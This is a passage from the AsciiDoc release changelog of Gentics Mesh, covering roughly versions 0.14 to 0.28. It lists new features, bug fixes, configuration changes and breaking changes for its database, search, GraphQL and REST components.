instead.\n\nicon:plus[] OrientDB 3.0.x: A reindex of all vertices and edges will be triggered during the first start-up. This can take some time depending on the database size.\n\nicon:plus[] Memory: The internal overall memory usage has been optimized.\n\nicon:plus[] Core: The way language references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.\n\nicon:check[] Clustering: The OrientDB 3.0.13 update addresses various issues which were related to clustering.\n\nicon:check[] Migrations: The schema migration code has been optimized for speed and memory usage.\n\nicon:check[] Migrations: Schema migrations will now always be executed on the cluster node which also handled the REST request. Previously the migration was executed on a random node in the cluster.\n\nicon:check[] Core: The internal transaction retry max count has been reduced from 100 to 10 iterations.\n\nicon:check[] Core: The internal transaction handling has been optimized.\n\nicon:check[] Security: A minor security issue has been fixed.\n\n[[v0.28.3]]\n== 0.28.3 (09.01.2019)\n\nicon:check[] GraphQL: Resolved links will now contain the hostname of the target branch, not the latest branch.\n\nicon:check[] Elasticsearch: Search indices are now created sequentially. Parallel creation of indices caused problems when many indices would have to be created.\n\nicon:plus[] Core: When resolving links with type FULL, and the chosen branch is not the latest branch, the query parameter for the branch will be added to the rendered link.\n\nicon:plus[] Java Rest Client: Added new REST client implementation. The `MeshRestOkHttpClientImpl` implementation will replace the current Java client in a future release. It is advised to switch to the new implementation which is based on the OkHttp library instead of Vert.x.\n\n[[v0.28.2]]\n== 0.28.2 (26.11.2018)\n\nicon:check[] Changelog: Enhanced changelog entry fix from release `0.28.1` to fix additional issues.\n\n[[v0.28.1]]\n== 0.28.1 (26.11.2018)\n\nicon:plus[] Java Rest Client: The `version` property of the `NodeUpdateRequest` is now by default set to `draft`. Setting the value to draft will override the conflict detection handling and always compare the posted data with the latest draft version.\n\nicon:plus[] Java Rest Client: The `upsertNode` method has been added to the REST client which can be used to create or update a node.\n\nicon:plus[] Demo: The example uuids and dates in the `{apiLatest}\/raml` response and the documentation are now static and will no longer change between releases. link:https:\/\/github.com\/gentics\/mesh\/issues\/477[#477]\n\nicon:plus[] Core: Deletion of micronode and list field data has been implemented in the core. Previously these elements were not removed from the graph. link:https:\/\/github.com\/gentics\/mesh\/issues\/192[#192]\n\nicon:check[] Changelog: Fixed a bug in the webroot index database migration entry which caused a `ORecordDuplicatedException` changelog error and prevented update and startup of older databases. link:https:\/\/github.com\/gentics\/mesh\/issues\/554[#554], link:https:\/\/github.com\/gentics\/mesh\/issues\/546[#546]\n\nicon:check[] Core: Fixed a bug that caused link:https:\/\/getmesh.io\/docs\/api\/#project__branches__branchUuid__migrateSchemas_post[\/migrateSchemas] to fail when a newer schema version was not assigned to the branch. link:https:\/\/github.com\/gentics\/mesh\/issues\/532[#532]\n\nicon:check[] Core: Nodes are now migrated to the newest schema version when a new branch is created. link:https:\/\/github.com\/gentics\/mesh\/issues\/521[#521]\n\nicon:check[] Core: Fixed a bug that prevented moving a published node in one language to a published container of another language.\n\n[[v0.28.0]]\n== 0.28.0 (20.11.2018)\n\nCAUTION: The property `meshNodeId` of the `{apiLatest}\/` response was renamed to `meshNodeName` to be more consistent.\n\nicon:plus[] REST: It is now possible to set existing or new tags during node creation and node update. Tags that are listed in both of those requests will be created if not found and assigned to the updated or created node.\n\nicon:plus[] Eventbus: It is now possible to register custom eventbus addresses.\n\nicon:plus[] REST: Download of binaries will now support byte range requests. Web media players require this feature in order to support seeking in video streams.\n\nicon:plus[] API: Make OAuth2 Server options overrideable via environment variables.\n\nicon:check[] Permissions: A bug in the permission handling has been fixed. Previously the read permission was also granted when create was granted to elements. link:https:\/\/github.com\/gentics\/mesh\/issues\/562[#562]\n\nicon:check[] Branches: Resolved links will now contain the hostname of the target branch, not the latest branch.\n\nicon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.\n\nicon:check[] REST: A concurrency issue has been fixed which could lead to problems when creating multiple schemas in-parallel.\n\nicon:check[] REST: Fix error message when no node for a content can be found. link:https:\/\/github.com\/gentics\/mesh\/issues\/364[#364]\n\n[[v0.27.2]]\n== 0.27.2 (07.11.2018)\n\nicon:check[] REST: The CPU utilization for download requests has been reduced. link:https:\/\/github.com\/gentics\/mesh\/issues\/530[#530]\n\nicon:plus[] Core: The Gentics Mesh server will now use native bindings to increase HTTP performance on Linux x86_64 platforms.\n\nicon:check[] REST: Branch create requests will now correctly set the path prefix property. The value of the property was previously not used.\n\nicon:check[] REST: Added more detailed error information when accessing a resource without permission. link:https:\/\/github.com\/gentics\/mesh\/issues\/314[#314]\n\n[[v0.27.1]]\n== 0.27.1 (31.10.2018)\n\nicon:plus[] REST: It is now possible to specify a path prefix for branches. When specified, all resolved paths will include the prefix. The webroot endpoint will also utilize the prefix to resolve nodes. The prefix can be set for new projects or for update requests on existing branches.\n\nicon:check[] Java REST Client: Fixed wrong log output information.\n\nicon:check[] REST: Fixed error while fetching jobs for deleted projects.\n\nicon:plus[] Elasticsearch: The index sync will now automatically remove no longer used indices.\n\nicon:check[] REST: Fixed an error that can happen when creating new nodes which contain binary fields that reference a not yet stored binary sha512sum. link:https:\/\/github.com\/gentics\/mesh\/issues\/524[#524]\n\n[[v0.27.0]]\n== 0.27.0 (19.10.2018)\n\nCAUTION: The volumes inside the docker images `gentics\/mesh` and `gentics\/mesh-demo` have been refactored. By default the volumes `\/graphdb`, `\/uploads`, `\/backups`, `\/plugins`, `\/keystore` and `\/config` will be used for the corresponding data. The `\/data` volume and location was removed. Details can be found in the link:{{< relref \"administration-guide.asciidoc\" >}}#_volumes_locations[documentation].\n\nicon:plus[] Configuration: It is now possible to configure the upload limit using the `MESH_BINARY_UPLOAD_LIMIT` environment variable.\n\nicon:plus[] Java REST Client: It is now possible to set the base path of the API via `MeshRestClient#setBaseUri(String uri)`.\n\nicon:check[] Security: A minor security issue has been fixed.\n\nicon:check[] REST: An issue with the ETag generation of user responses has been fixed. link:https:\/\/github.com\/gentics\/mesh\/issues\/489[#489]\n\n[[v0.26.0]]\n== 0.26.0 (15.10.2018)\n\nicon:plus[] Branches: It is now possible to set the \"latest\" branch of a project.\n\nicon:plus[] Branches: It is now possible to create branches based on specific other branches.\n\nicon:plus[] Branches: Branches can now be tagged just like nodes.\n\nicon:plus[] Clustering: The Hazelcast kubernetes autodiscovery plugin was added to Gentics Mesh. It is now possible to use this plugin to discover nodes in an k8s environment. Take a look at our link:{{< relref \"clustering.asciidoc\" >}}#_kubernetes[documentation] for more details.\n\nicon:check[] Java REST Client: Add more detailed error information to `MeshRestClientMessageException` class.\n\n[[v0.25.0]]\n== 0.25.0 (08.10.2018)\n\nicon:plus[] Plugins: It is now possible to override plugin config in a `config.local.yml` file\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.4\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37\n\nicon:plus[] GraphQL: Added filters for users, groups and roles.\n\nicon:check[] GraphQL: GraphQL Java has been updated to version 10.0\n\nicon:check[] Core: Loading of older jobs could cause an error. The causes of those errors have been fixed.\n\nicon:check[] Migration: Fix migration regression which was introduced with 0.24.1\n\nicon:check[] Demo: Fix demo webroot path handling. This fix only affects new demo setups.\n\n[[v0.24.1]]\n== 0.24.1 (02.10.2018)\n\nicon:plus[] Config: It is now possible to configure the path to the mesh lock file using the `MESH_LOCK_PATH` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/506[#506]\n\nicon:plus[] It is now possible to add custom languages by configuration.\n\nicon:check[] UI: Added a scrollbar to the schema dropdown menu. link:https:\/\/github.com\/gentics\/mesh-ui\/pull\/163[#163]\n\nicon:check[] Core: A inconsistency within the webroot path handling has been fixed. Previously the webroot path uniqueness checks would not work correctly once another branch has been added.\n\nicon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.\n\nicon:check[] Elasticsearch: The initial sync check will be omitted if no elasticsearch has been configured.\n\nicon:check[] Java REST Client: fixed a bug that could lead to duplicate request headers.\n\n[[v0.24.0]]\n== 0.24.0 (25.07.2018)\n\nCAUTION: The default value of `25` for the `perPage` parameter has been removed. By default all elements will be returned and no paging will be applied.\n\nicon:check[] Core: A regression within the webroot performance enhancement fix of `0.23.0` has been fixed.\n\n[[v0.23.0]]\n== 0.23.0 (24.07.2018)\n\nCAUTION: The breadcrumb of the REST node response and the breadcrumb of the node type in GraphQL has changed. The first element is now the root node of the project followed by its descendants including the currently queried node. Previously the order was reversed. Additionally the root node and the current were missing. link:https:\/\/github.com\/gentics\/mesh\/issues\/398[#398]\n\nCAUTION: The concept of releases has been renamed into branches. The database structure will automatically be updated.\n\n* The following query parameters have been changed: `release` -> `branch`, `updateAssignedReleases` -> `updateAssignedBranches`, `updateReleaseNames` -> `updateBranchNames`\n* The `releases` endpoint was renamed to `branches`.\n* The `mesh.release.created`, `mesh.release.updated`, `mesh.release.deleted` events have been changed to `mesh.branch.created`, `mesh.branch.updated`, `mesh.branch.deleted`.\n* The Java REST Models have been renamed. (e.g.: ReleaseCreateRequest -> BranchCreateRequest)\n* I18n messages have been changed accordingly.\n* The GraphQL field `release` has been renamed to `branch`. The type name was also updated.\n\nicon:plus[] Elasticsearch: The base64 encoded binary document data will no longer be stored in the search index.\n\nicon:plus[] Elasticsearch: The `\/search\/status` endpoint now has a new field `available`, which shows if Elasticsearch is currently ready to process search queries.\n\nicon:plus[] Elasticsearch: An error was fixed which was thrown when Elasticsearch was disabled and a re-sync was scheduled.\n\nicon:plus[] REST: Added `?etag=false` query parameter which can be used to omit the etag value generation in order to increase performance when etags are not needed.\n\nicon:plus[] REST: Added `?fields=uuid,username` query parameter which can be used to filter the response to only include the listed fields within a response. The filters work for most responses and can be used to increase write performance for REST.\n\nicon:plus[] GraphQL: It is now possible to filter schemas by their container flag.\n\nicon:check[] GraphQL: Fixed a bug that caused an error when multiple queries where executed concurrently.\n\nicon:check[] Core: Increased performance for webroot endpoint.\n\nicon:plus[] REST: Re-enabled SSL options. It is now possible to configure SSL via `MESH_HTTP_SSL_KEY_PATH`, `MESH_HTTP_SSL_CERT_PATH`, `MESH_HTTP_SSL_ENABLE` environment options.\n\n[[v0.22.11]]\n== 0.22.11 (05.03.2019)\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 10.0.\n\nicon:plus[] GraphQL: nodes can now be loaded via a list of UUIDs.\n\n[[v0.22.10]]\n== 0.22.10 (18.01.2019)\n\nicon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never be finished. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.\n\nicon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing.\n\n[[v0.22.9]]\n== 0.22.9 (15.01.2019)\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:plus[] Memory: The memory footprint of various operations has been reduced.\n\nicon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which lists the count of repair operations.\n The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.\n\nicon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.\n\n[[v0.22.8]]\n== 0.22.8 (30.11.2018)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37\n\n[[v0.22.7]]\n== 0.22.7 (12.11.2018)\n\nicon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.\n\nicon:plus[] API: Make OAuth2 Server options overrideable via environment variables.\n\n[[v0.22.6]]\n== 0.22.6 (30.10.2018)\n\nicon:check[] Java REST Client: Fixed wrong log output information.\n\nicon:check[] REST: Fixed error while fetching jobs for deleted projects.\n\nicon:plus[] Elasticsearch: The index sync will now automatically remove no longer used indices.\n\n\n[[v0.22.5]]\n== 0.22.5 (12.10.2018)\n\nicon:plus[] A default paging value can now be configured via the `defaultPageSize` field in the `mesh.yml` file, or the `MESH_DEFAULT_PAGE_SIZE` environment variable.\n\nicon:check[] Java REST Client: Add more detailed error information to `MeshRestClientMessageException` class.\n\n[[v0.22.4]]\n== 0.22.4 (08.10.2018)\n\nicon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.\n\nicon:check[] Elasticsearch: The initial sync check will be omitted if no elasticsearch has been configured.\n\nicon:plus[] Plugins: It is now possible to override plugin config in a `config.local.yml` file.\n\n[[v0.22.3]]\n== 0.22.3 (20.09.2018)\n\nicon:plus[] It is now possible to add custom languages by configuration.\n\n[[v0.22.2]]\n== 0.22.2 (13.09.2018)\n\nicon:check[] Java REST Client: fixed a bug that could lead to duplicate request headers\n\n[[v0.22.1]]\n== 0.22.1 (14.08.2018)\n\nicon:plus[] Migration: The micronode and release migration performance has been greatly enhanced.\n\n[[v0.22.0]]\n== 0.22.0 (19.07.2018)\n\nicon:bullhorn[] Metadata extraction\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Metadata extraction__ of file uploads (PDF, Images).\nGPS information of images will now be added to the search index. That information can be used to run link:{{< relref \"elasticsearch.asciidoc\" >}}#_search_nodes_by_geolocation_of_images[geo search queries].\nA detailed description of this feature can be found in our {{< relref \"features.asciidoc\" >}}#_metadata_handling[File Uploads Documentation].\n\nExisting binary fields will not be automatically be processed to provide the metadata. You need to manually re-upload the data in order to generate the metadata properties.\n____\n\nicon:check[] Image: Focal point information within binary fields will now be utilized when invoking a download request which contains `?crop=fp&height=200&width=100`. Previously the stored information was not used and no focal point cropping was executed. link:https:\/\/github.com\/gentics\/mesh\/issues\/417[#417]\n\nicon:check[] Schema: A minor issue within the schema diff mechanism has been fixed. Previously the `elasticsearch` property was not correctly handled if an empty object has been provided during an update.\n\n[[v0.21.5]]\n== 0.21.5 (14.07.2018)\n\nicon:check[] REST: The order of elements within a micronode list field will now be correctly preserved. Previously the order would change once the list reached a size of about 20 elements. link:https:\/\/github.com\/gentics\/mesh\/issues\/469[#469]\n\nicon:check[] Memory: The memory footprint for deletion, publish and unpublish operations has been greatly reduced.\n\nicon:check[] Config: Fixed handling of `MESH_VERTX_WORKER_POOL_SIZE` and `MESH_VERTX_EVENT_POOL_SIZE` environment variables. These variables were previously ignored.\n\nicon:check[] REST: The node update response will now contain the updated node in the correct language. Any provided language parameter will be ignored.\n\nicon:plus[] REST: The amount of fields which will be returned can now be tuned using the `?fields` query parameter. The parameter can be used to improve the write performance by only including the `uuid` parameter in the response.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.3\n\n[[v0.21.4]]\n== 0.21.4 (09.07.2018)\n\nicon:plus[] Migration: Segment path conflicts will now automatically be resolved during the node migration. Information about actions taken can be found within the response of the job migration.\n\nicon:plus[] Migration: The node migration performance has been greatly enhanced. link:https:\/\/github.com\/gentics\/mesh\/issues\/453[#453]\n\nicon:check[] Elasticsearch: Start up of Gentics Mesh will now fail early if the embedded Elasticsearch server can't be started. link:https:\/\/github.com\/gentics\/mesh\/issues\/445[#445]\n\nicon:check[] Elasticsearch: The error logging has been enhanced. More detailed information will be logged if an index can't be created.\n\nicon:check[] UI: Fixed potential encoding issues in the UI on systems which are not using the UTF-8 default character set.\n\nicon:check[] Core: Fixed a bug that caused an unwanted schema migration when a schema update without any changes was invoked. This was the case with the `elasticsearch` properties.\n\n[[v0.21.3]]\n== 0.21.3 (19.06.2018)\n\nicon:check[] GraphQL: Fixed a bug that caused an error when multiple queries where executed concurrently.\n\nicon:check[] GraphQL: The language fallback handling for node reference fields has been enhanced. The language of the node will now be utilized when no language fallback has been specified.\n\nicon:check[] GraphQL: The language fallback handling has been enhanced. The language fallback will now automatically be passed along to load nested fields.\n\nicon:check[] GraphQL: The link resolving of html and string fields has been updated. Previously the language of the node which contained the field was not taken into account while resolving mesh links in these fields.\n\n[[v0.21.2]]\n== 0.21.2 (13.06.2018)\n\nicon:check[] Elasticsearch: A compatibility issue with Elasticsearch instances which were hosted on Amazon AWS has been fixed. Previously the check for installed ES plugins failed.\n\n\n[[v0.21.1]]\n== 0.21.1 (28.05.2018)\n\nicon:plus[] Elasticsearch: It is now possible to configure https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/mapping.html[custom mappings] for binary fields. Currently only the `mimeType` and `file.content` fields can be mapped. An example for this mapping can be found in the link:{{< relref \"elasticsearch.asciidoc\" >}}#_binary_fields[Gentics Mesh search documentation].\n\n[[v0.21.0]]\n== 0.21.0 (27.05.2018)\n\nicon:bullhorn[] Binary Search\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Binary Search support__.\n\nThe https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/plugins\/6.2\/ingest-attachment.html[Elasticsearch Ingest Attachment Plugin] will be utilized if possible to process text file uploads (PDF, DOC, DOCX).\nA detailed description of this feature can be found in our link:{{< relref \"elasticsearch.asciidoc\" >}}#_binarysearch[Elasticsearch Documentation].\n____\n\nicon:plus[] Elasticsearch: It is now possible to configure a prefix string within the search options. Multiple Gentics Mesh installations with different prefixes can now utilize the same Elasticsearch server. Created indices and pipelines will automatically be prefixed. Other elements which do not start with the prefix will be ignored.\n\n[[v0.20.0]]\n== 0.20.0 (25.05.2018)\n\nicon:bullhorn[] OAuth2 Support\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __OAuth2 authentication support__. A detailed description of this feature can be found in our link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[Authentication Documentation].\n____\n\nicon:plus[] Plugins: All plugin endpoints will now automatically be secured via the configured authentication mechanism.\n\nicon:check[] Plugins: The admin client token will no longer expire. The token was previously only valid for one hour.\n\nicon:check[] Plugins: When deployment of a plugin fails during plugin initialization, the plugin can now be redeployed without restarting Gentics Mesh.\n\nicon:check[] Plugins: Fixed a bug which prevented the user client from using the correct token was fixed. The user client will now utilize the correct user token.\n\n[[v0.19.2]]\n== 0.19.2 (02.05.2018)\n\nicon:check[] Docker: The base image of the Gentics Mesh docker container has been reverted back to `java:openjdk-8-jre-alpine`. We will switch to Java 10 with the upcoming OrientDB 3.0.0 update.\n\nicon:check[] UI: In some cases the UI did not load fast. We updated the caching mechanism to quickly load the UI after a new Gentics Mesh version has been deployed.\n\n[[v0.19.1]]\n== 0.19.1 (30.04.2018)\n\nicon:plus[] REST: The `{apiLatest}\/admin\/consistency\/repair` endpoint has been added. The endpoint can be used to verify and directly repair found inconsistencies.\n The `{apiLatest}\/admin\/consistency\/check` endpoint response has been updated to also include information about the action which will be performed by `\/repair` in order to repair the inconsistency.\n You can read more about these endpoints in the link:{{< relref \"administration-guide.asciidoc\" >}}#_database_consistency[database consistency] section in our administration documentation.\n\n[[v0.19.0]]\n== 0.19.0 (28.04.2018)\n\nicon:bullhorn[] Plugin System\n\n[quote]\n____\nThis version of Gentics Mesh introduces the _Plugin System_. A detailed description of this feature can be found in our link:{{< relref \"plugin-system.asciidoc\" >}}[Plugin System Documentation].\n____\n\nicon:plus[] The base image of the Gentics Mesh docker container has been changed to `openjdk:10-slim`.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\n[[v0.18.3]]\n== 0.18.3 (25.04.2018)\n\nicon:check[] REST: Add error response when updating a user node reference without specifying the project name.\n\nicon:check[] REST: Fixed the root cause of an inconsistency which caused the deletion of referenced nodes when deleting a node.\n\n[[v0.18.2]]\n== 0.18.2 (23.04.2018)\n\nCAUTION: Database revision was updated due to OrientDB update. Thus only an link:{{< relref \"clustering.asciidoc\" >}}#_offline_upgrade[offline upgrade] can be performed when using clustered mode.\n\nCAUTION: The generation of the search index document version has been reworked in order to increase index sync performance.\n A triggered index sync will thus re-sync all documents. Triggering the sync action is not required and can be executed at any time.\n\nicon:plus[] Backup\/Restore: It is now no longer required to restart the server after a backup has been restored via the `{apiLatest}\/admin\/graphdb\/restore` endpoint. link:https:\/\/github.com\/gentics\/mesh\/issues\/387[#387]\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.34\n\nicon:plus[] Consistency: Additional consistency checks have been added.\n\nicon:check[] Consistency: Various consistency issues have been fixed.\n\nicon:check[] REST: Fixed various security related issues.\n\nicon:check[] Core: Image data in binary fields will now only be processed\/transformed if the binary is in a readable file format. The readable image file formats are `png`, `jpg`, `bmp` and `gif`.\n\nicon:check[] Core: Added consistency checks for node versions.\n\nicon:check[] Core: Deleting language versions of nodes will no longer create inconsistencies.\n\nicon:check[] Core: Projects containing multiple releases can now be deleted without any error.\n\n[[v0.18.1]]\n== 0.18.1 (13.04.2018)\n\nicon:check[] Core: Added consistency check for node containers.\n\nicon:check[] GraphQL: Using filtering with nodes without content does not throw an error anymore.\n\nicon:check[] REST: Added missing `hostname` and `ssl` property handling for release creation requests.\n\nicon:check[] REST: Creating a release with fixed UUID will now invoke the node migration.\n\nicon:check[] Java REST Client: The `eventbus()` method now correctly sends authorization headers.\n\nicon:check[] Java Rest Client: Missing methods to start schema\/microschema migrations for a release have been added.\n\n[[v0.18.0]]\n== 0.18.0 (06.04.2018)\n\nicon:bullhorn[] GraphQL filtering\n\n[quote]\n____\nThis version of Gentics Mesh introduces _GraphQL filtering_. A detailed description of this feature can be found in our link:{{< relref \"graphql.asciidoc\" >}}#_filtering[Documentation].\n____\n\n---\n\nCAUTION: Search: The `{apiLatest}\/search\/reindex` endpoint was replaced by `{apiLatest}\/search\/sync`.\n\nicon:plus[] Docs: The link:{{< relref \"contributing.asciidoc\" >}}[Contribution Guide] has been added.\n\nicon:plus[] The `{apiLatest}\/search\/sync` endpoint can now be used to trigger the differential synchronization of search indices.\n The indices will no longer be dropped and re-populated. Instead only needed actions will be executed to sync the index with the Gentics Mesh data.\n\nicon:plus[] The `{apiLatest}\/search\/clear` endpoint has been added. It can be used to re-create all Elasticsearch indices which are managed by Gentics Mesh.\n Note that this operation does not invoke the index sync.\n\nicon:plus[] Docker: A new volume location for the data directory of the embedded elasticsearch has been added.\n You can now use the `\/elasticsearch\/data` folder to mount your elasticsearch data files. link:https:\/\/github.com\/gentics\/mesh\/issues\/348[#348]\n\nicon:plus[] REST: The `{apiLatest}\/search\/status` endpoint has been enhanced. The endpoint will now also return the current elasticsearch sync progress.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\nicon:check[] REST: Fix ETag generation for nodes.\n Previously taking a node offline did not alter the ETag and this also lead to inconsistent status\n information being displayed in the Mesh UI link:https:\/\/github.com\/gentics\/mesh\/issues\/345[#345]\n\nicon:check[] Java Rest Client: Fix webroot requests never returns when containing whitespaces.\n\nicon:check[] GraphQL: Fixed language parameter in nodes query method was ignored in some cases. link:https:\/\/github.com\/gentics\/mesh\/issues\/365[#365]\n\nicon:check[] REST: The `{apiLatest}\/microschemas` endpoint will now correctly detect name conflicts during microschema creation.\n\n[[v0.17.3]]\n== 0.17.3 (15.03.2018)\n\nicon:check[] UI: Restrict nodes to certain schema if allow is set in node list fields.\n\n[[v0.17.2]]\n== 0.17.2 (13.03.2018)\n\nicon:plus[] Docker: A new volume location for the `config` directory has been added.\n You can now use the `\/config` folder to mount your configuration files.\n\nicon:plus[] Core: The Vert.x library has been downgraded to 3.5.0 due to a regression which could cause requests to not be handled by the HTTP Server.\n\n[[v0.17.1]]\n== 0.17.1 (08.03.2018)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.33\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.5.1\n\nicon:plus[] Config: It is now possible to configure the elasticsearch start-up timeout via the `search.startupTimeout` field in the `mesh.yml` or via the `MESH_ELASTICSEARCH_STARTUP_TIMEOUT` environment variable.\n\nicon:plus[] Search: The reindex endpoint will now execute the reindex operation asynchronously.\n\nicon:plus[] Search: Two new reindex specific events have been added: `mesh.search.reindex.failed`, `mesh.search.reindex.completed`.\n\nicon:plus[] REST: The `GET {apiLatest}\/search\/status` endpoint response has been updated. The `reindexRunning` flag has been added.\n\nicon:check[] Config: Fixed a bug which prevented optional boolean environment variables (e.g. `MESH_HTTP_CORS_ENABLE_ENV`) from being handled correctly.\n\nicon:check[] Core: It is now possible to change the listType of a list field in a schema via the Rest-API.\n\nicon:check[] Core: The server will now shutdown if an error has been detected during start-up.\n\nicon:check[] REST: Fixed an error which led to inconsistent properties being shown in the job endpoint response.\n\nicon:check[] Search: When calling reindex via the `POST {apiLatest}\/search\/reindex` endpoint the reindexing stopped after a certain amount of\n time because of a timeout in the database transaction. This has been fixed now.\n\nicon:check[] REST: In some cases parallel file uploads of multiple images could cause the upload process to never finish. This has been fixed now.\n\n[[v0.17.0]]\n== 0.17.0 (22.02.2018)\n\nCAUTION: Search: The raw search endpoints now wraps a multisearch request. The endpoint response will now include the elasticsearch responses array. The query stays the same.\n\nicon:plus[] Demo: The link:https:\/\/demo.getmesh.io\/demo[demo application] was updated to use Angular 5.\n\nicon:plus[] Core: Gentics Mesh can now be downgraded if the link:{{< relref \"administration-guide.asciidoc\" >}}#database-revisions[database revision] matches the needed revision of Gentics Mesh.\n\nicon:plus[] Clustering: Gentics Mesh is now able to form cluster between different server versions.\n\t\t\tA database revision hash will now be used to determine which versions of Gentics Mesh can form a cluster.\n\t\t\tOnly instances with the same database revision hash are allowed to form a cluster.\n\t\t\tThe current revision hash info is included in the `{apiLatest}` endpoint response.\n\nicon:plus[] Various settings can now be overridden via link:{{< relref \"administration-guide.asciidoc\" >}}#_environment_variables[environment variables]. This is useful when dealing with docker based deployments.\n\nicon:check[] Elasticsearch: Search requests failed on systems with many schemas. link:https:\/\/github.com\/gentics\/mesh\/issues\/303[#303]\n\nicon:check[] Elasticsearch: Fixed handling of `search.url` settings which contained a https URL.\n\nicon:check[] Image: The image resizer returned the original image if no `fpx`,`fpy` were present for a focal point image resize request. link:https:\/\/github.com\/gentics\/mesh\/issues\/272[#272]\n\nicon:check[] Image: The focal point resize returned a slightly skewed image when using the `fpz` zoom factor. link:https:\/\/github.com\/gentics\/mesh\/issues\/272[#272]\n\nicon:check[] Events: The `mesh.node.deleted` event was not handled correctly. This has been fixed now.\n\nicon:check[] Core: It was possible to upload binaries with empty filenames. This has been fixed now: it is enforced that\n\t\t\t\t a binary upload has a filename and content type which are not empty. link:https:\/\/github.com\/gentics\/mesh\/issues\/299[#299]\n\nicon:check[] Core: If the keystore path was only a file name without a directory a NPE was thrown on start-up. This has been fixed now.\n\nicon:check[] Core: After resetting a job via rest (admin\/jobs\/::uuid::\/error) the job was not processed again.\n This has been fixed now. link:https:\/\/github.com\/gentics\/mesh\/issues\/295[#295]\n\nicon:check[] Core: When the migration for multiple nodes failed during a schema migration the error details could become very long.\n\t\t\t\t\tThis has been fixed now. Error details in the job list will be truncated after a certain amount of characters.\n\nicon:check[] Core: Image transformation calls previously did not copy the image properties of the binary field.\n Instead the filename and other properties were not copied to the new binary image field. This has been fixed now.\n\nicon:plus[] REST: It is now possible use custom `HttpClientOptions` upon instantiation of a `MeshRestHttpClient`.\n\nicon:check[] REST: The node response ETag now incorporates the uuids of all node references.\n\nicon:check[] REST: The `{apiLatest}\/auth\/logout` endpoint will now correctly delete the `mesh.token` cookie. link:https:\/\/github.com\/gentics\/mesh\/issues\/282[#282]\n\n[[v0.16.0]]\n== 0.16.0 (07.02.2018)\n\nCAUTION: Search: The contents of HTML and HTML list fields will now automatically be stripped of markup prior of indexing.\n\nCAUTION: The `mesh.yml` search section has been updated. The `search.url` property replaces the `search.hosts` property.\n\n[source,json]\n----\nsearch:\n url: \"http:\/\/localhost:9200\"\n timeout: 8000\n startEmbedded: false\n----\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 7.0.\n\nicon:check[] REST: An error which prevented the `{apiLatest}` info endpoint from returning version information has been fixed.\n\nicon:plus[] OrientDB: The included OrientDB Studio has been updated to version 2.2.32.\n\nicon:plus[] Config: It is now possible to configure the JVM arguments of the embedded Elasticsearch server via the `search.embeddedArguments` property in the `mesh.yml` file.\n\nicon:plus[] GraphQL: Schema fields can now be queried. Currently supported are `name`, `label`, `required` and `type`.\n\n[[v0.15.0]]\n== 0.15.0 (31.01.2018)\n\nCAUTION: The embedded Elasticsearch was removed and replaced by a connector to a dedicated Elasticsearch server. It is highly recommended to verify existing queries due to breaking changes between Elasticsearch version 2.4 and 6.1.\nPlease also check the Elasticsearch changelog: link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/release-notes-6.1.0.html[Elasticsearch Changelog]\n\nCAUTION: Configuration: The `mesh.yml` format has been updated. Please remove the `search` section or replace it with the following settings.\n\n[source,json]\n----\nsearch:\n hosts:\n - hostname: \"localhost\"\n port: 9200\n protocol: \"http\"\n startEmbeddedES: true\n----\n\nCAUTION: The Elasticsearch update may affect custom mappings within your schemas. You may need to manually update your schemas.\n\nElasticsearch 6.1 compliant example for the commonly used raw field:\n\n[source,json]\n----\n{\n \"fields\": {\n \"raw\": {\n \"type\": \"keyword\",\n \"index\": true\n }\n }\n}\n----\n\nCAUTION: The `unfilteredCount` GraphQL paging property has been removed. You can now use the `totalCount` property instead.\n\nCAUTION: Gentics Mesh will automatically extract and start an embedded Elasticsearch server into the `elasticsearch` folder. The old search index (e.g: `data\/searchIndex`) can be removed.\n\nCAUTION: The user which is used to run the process within the docker image has been changed. You may need to update your data volume ownership to uid\/gid 1000.\n\nicon:plus[] REST: The UUID of the referenced binary data will now also be listed for binary fields. Fields which share the same binary data will also share the same binary UUID.\n\nicon:plus[] GraphQL: It is now possible to read the focal point information and binary uuid of binary fields.\n\nicon:plus[] Docs: The link:{{< relref \"elasticsearch.asciidoc\" >}}[Elasticsearch integration documentation] has been enhanced.\n\nicon:plus[] Search: The overall search performance has been increased.\n\nicon:plus[] Logging: The logging verbosity has been further decreased.\n\n[[v0.14.2]]\n== 0.14.2 (30.01.2018)\n\nicon:check[] Elasticsearch: Fixed a bug which caused an internal error when granting multiple permissions to the same element at the same time.\n\nicon:check[] GraphQL: The `linkType` parameter for string and html fields now causes the the link to be rendered in the language of the queried node if no 